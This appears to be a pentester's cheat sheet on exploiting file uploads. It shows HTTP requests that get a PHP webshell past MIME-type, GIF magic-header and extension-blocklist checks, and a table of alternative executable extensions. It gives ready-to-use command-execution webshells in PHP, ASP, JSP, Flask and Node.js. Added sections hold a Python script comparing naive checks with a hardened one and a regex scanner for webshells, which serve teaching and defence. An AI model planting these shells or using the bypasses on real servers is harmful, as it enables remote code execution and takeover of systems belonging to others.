File Upload
2026-03-13 #file-upload #webshell #bypass #web #exploitation
Attack vectors
- Try different file types (jpg, pdf, php, exe…)
- Embed code inside image files
- Change the file's declared MIME type
- Upload very large files (DoS)
Bypass
MIME Type
Change `Content-Type: text/php` to `Content-Type: image/png` in the file part, so a server that only validates the client-declared MIME type accepts the file:

```http
POST / HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6CZGdFhAqm0hjeeA

------WebKitFormBoundary6CZGdFhAqm0hjeeA
Content-Disposition: form-data; name="input_image"; filename="cmd.php"
Content-Type: image/png

<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
------WebKitFormBoundary6CZGdFhAqm0hjeeA--
```
Magic Header
Prepend `GIF89a;` to the file so that checks based on the file signature (file(1), PHP's exif_imagetype()) identify it as a GIF:

```http
------WebKitFormBoundaryiXbT96o7HsUdrZoy
Content-Disposition: form-data; name="input_image"; filename="cmd.php"
Content-Type: text/php

GIF89a;
<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
------WebKitFormBoundaryiXbT96o7HsUdrZoy--
```
Extension Bypass
Try alternative extensions that the server still hands to the interpreter:

| Language | Extensions |
|---|---|
| PHP | .php, .php2, .php3, .php4, .php5, .php7, .pht, .phtml, .phar |
| ASP | .asp, .aspx, .ashx, .asmx, .cer, .shtml, .cshtml, .vbhtml |
| JSP | .jsp, .jspx, .jsw, .jspf, .do, .action |
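Worked example (added here, not part of the original notes): the three bypasses above run against the naive server-side checks each one defeats, next to a stricter check that none of them gets past. The multipart builder, the check functions and the payload bytes are constructed for illustration; the extension list is the table above, and the upper-case variants are an assumption about filters that compare case-sensitively while the server maps extensions case-insensitively.

```python
from pathlib import PurePosixPath

# Constructed payloads: the PHP shell from these notes, with and without the GIF magic.
WEBSHELL = b"<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"
GIF_PREFIXED = b"GIF89a;" + WEBSHELL

# Extensions from the table above. Upper-case variants are an assumption about
# filters that compare case-sensitively while the server maps them case-insensitively.
EXECUTABLE_EXTENSIONS = {
    "php": [".php", ".php2", ".php3", ".php4", ".php5", ".php7", ".pht", ".phtml", ".phar"],
    "asp": [".asp", ".aspx", ".ashx", ".asmx", ".cer", ".shtml", ".cshtml", ".vbhtml"],
    "jsp": [".jsp", ".jspx", ".jsw", ".jspf", ".do", ".action"],
}

# Signatures of the image formats an upload form typically allows.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",  # covers GIF87a and GIF89a
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}


def build_multipart(field, filename, content_type, data, boundary):
    """Body of a single-file multipart/form-data upload, as sent on the wire."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def candidate_filenames(stem, lang):
    """Filenames to try against an extension filter: every table entry, lower and upper case."""
    out = []
    for ext in EXECUTABLE_EXTENSIONS[lang]:
        out.append(stem + ext)
        out.append(stem + ext.upper())
    return out


# Three naive server-side checks, one per bypass section above.

def naive_mime_check(part_content_type):
    """Trusts the Content-Type the client put in the multipart part."""
    return part_content_type.startswith("image/")


def naive_magic_check(data):
    """Looks only at the leading bytes, the way exif_imagetype() or file(1) does."""
    return any(data.startswith(magic) for magic in IMAGE_MAGIC.values())


def naive_extension_blocklist(filename):
    """Rejects exactly one spelling of the dangerous extension."""
    return not filename.endswith(".php")


def hardened_check(filename, data):
    """Allowlisted extension, a single extension only, and magic bytes matching that extension."""
    if filename.count(".") != 1:
        # cmd.php.gif: Apache mod_mime evaluates every extension, so an AddHandler
        # mapping for .php can still execute a multi-extension name
        return False
    ext = PurePosixPath(filename).suffix.lower()
    if ext not in IMAGE_MAGIC:
        return False
    return data.startswith(IMAGE_MAGIC[ext])


def bypass_matrix():
    """Which trick gets past which check; True means the upload is accepted."""
    return {
        "mime:image/png": naive_mime_check("image/png"),
        "magic:GIF89a;<?php": naive_magic_check(GIF_PREFIXED),
        "blocklist:cmd.phtml": naive_extension_blocklist("cmd.phtml"),
        "blocklist:cmd.PHP": naive_extension_blocklist("cmd.PHP"),
        "hardened:cmd.php": hardened_check("cmd.php", GIF_PREFIXED),
        "hardened:cmd.png+GIF89a": hardened_check("cmd.png", GIF_PREFIXED),
        "hardened:cmd.php.gif": hardened_check("cmd.php.gif", GIF_PREFIXED),
        "hardened:cmd.gif": hardened_check("cmd.gif", GIF_PREFIXED),
    }


if __name__ == "__main__":
    body = build_multipart("input_image", "cmd.php", "image/png", WEBSHELL,
                           "----WebKitFormBoundary6CZGdFhAqm0hjeeA")
    print(body.decode())
    for name in candidate_filenames("cmd", "php"):
        print(f"{name:10} passes .php blocklist: {naive_extension_blocklist(name)}")
    for check, accepted in bypass_matrix().items():
        print(f"{check:26} accepted={accepted}")
```

The naive checks each accept the payload once the matching trick is applied; `hardened_check` accepts only `cmd.gif`, and that file is a GIF as far as the web server is concerned: the PHP inside it only runs if something executes `.gif` as PHP or includes it (LFI), which is why uploads should additionally be renamed server-side and stored outside the web root.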
Webshells
PHP
```php
<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
```
http://example.com/shell.php?cmd=whoami
ASP
```asp
<%
If Request.QueryString("cmd") <> "" Then
    Set objShell = Server.CreateObject("WScript.Shell")
    Set objExec = objShell.Exec(Request.QueryString("cmd"))
    Response.Write("<pre>" & objExec.StdOut.ReadAll() & "</pre>")
End If
%>
```
JSP
```jsp
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    // Runtime.exec(String) splits on whitespace and starts no shell:
    // pipes and redirects only work when wrapped in "sh -c '...'"
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String s;
    while ((s = sI.readLine()) != null) {
        out.println(s);
    }
}
%>
```
Python (Flask)
```python
import os
from flask import Flask, request

app = Flask(__name__)


@app.route('/shell', methods=['GET'])
def shell():
    # os.popen() runs the command through the system shell, so pipes work
    cmd = request.args.get('cmd')
    if cmd:
        return f"<pre>{os.popen(cmd).read()}</pre>"
    return "<pre>No command provided</pre>"


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)
```
Node.js
```javascript
const express = require('express');
const { exec } = require('child_process');

const app = express();

app.get('/shell', (req, res) => {
  const cmd = req.query.cmd;
  if (cmd) {
    // child_process.exec() runs the command through a shell, so pipes work
    exec(cmd, (error, stdout, stderr) => {
      res.send(`<pre>${error ? stderr : stdout}</pre>`);
    });
  } else {
    res.send('<pre>No command provided</pre>');
  }
});

app.listen(8080, '0.0.0.0');
```
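Defensive counterpart, added here and not part of the original notes: a small scanner that flags the kind of shells listed above by looking for a command-execution sink and a request-data source in the same file, ignoring the file extension. The sample file contents and the two regex lists are constructed for illustration; the samples are the shells on this page cut down to their key lines, plus one GIF-prefixed variant and one benign file.

```python
import re
from pathlib import Path

# Constructed samples: the shells on this page reduced to the lines that matter,
# one GIF89a-prefixed variant, and a benign file that reads request data but runs nothing.
SAMPLES = {
    "cmd.php": "<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>",
    "cmd.gif": "GIF89a;<?php system($_GET['c']); ?>",
    "cmd.asp": 'Set objExec = objShell.Exec(Request.QueryString("cmd"))',
    "cmd.jsp": 'Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));',
    "app.py": 'cmd = request.args.get("cmd")\nreturn f"<pre>{os.popen(cmd).read()}</pre>"',
    "server.js": "const cmd = req.query.cmd;\nexec(cmd, (error, stdout, stderr) => {",
    "gallery.php": "<?php echo htmlspecialchars($_GET['title']); ?>",
}

# Command-execution sinks across PHP, ASP, JSP, Python and Node.
SINKS = re.compile(
    r"\b(system|passthru|shell_exec|proc_open|popen|exec|execSync|spawn|"
    r"Runtime\.getRuntime\(\)\.exec|WScript\.Shell|child_process)\b",
    re.I,
)
# Sources of attacker-controlled request data in the same languages.
SOURCES = re.compile(
    r"(\$_(GET|POST|REQUEST|COOKIE)\b|Request\.(QueryString|Form)\b|"
    r"request\.getParameter\b|request\.(args|form)\b|req\.(query|body|params)\b)",
    re.I,
)


def scan_text(text):
    """Collect sink and source hits per line; flag the file when both are present.

    A sink and a source on the same line (system($_GET['cmd'])) is the
    high-confidence signal; both present anywhere in a short upload is still
    enough to flag it, since the Flask and Node shells split them over two lines.
    """
    sinks, sources, same_line = [], [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        hit_sinks = [m.group(0) for m in SINKS.finditer(line)]
        hit_sources = [m.group(0) for m in SOURCES.finditer(line)]
        sinks += hit_sinks
        sources += hit_sources
        if hit_sinks and hit_sources:
            same_line.append(lineno)
    return {
        "sinks": sinks,
        "sources": sources,
        "same_line": same_line,
        "suspicious": bool(sinks) and bool(sources),
    }


def scan_file(path):
    """Scan a file on disk by content only; the extension is deliberately ignored."""
    return scan_text(Path(path).read_text(errors="ignore"))


def flagged_samples():
    """Names of the constructed samples the scanner flags, sorted."""
    return sorted(name for name, text in SAMPLES.items() if scan_text(text)["suspicious"])


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        r = scan_text(text)
        print(f"{name:12} suspicious={str(r['suspicious']):5} "
              f"same_line={r['same_line']} sinks={r['sinks']}")
```

Because only the content is inspected, `cmd.gif` with the GIF89a prefix is caught just like `cmd.php`, while `gallery.php` (a source but no sink) is not. This catches the plain one-liners on this page; obfuscated shells (base64-encoded bodies, `eval`, variable function names) need different signatures or behavioural detection such as alerting when the web server process spawns a shell.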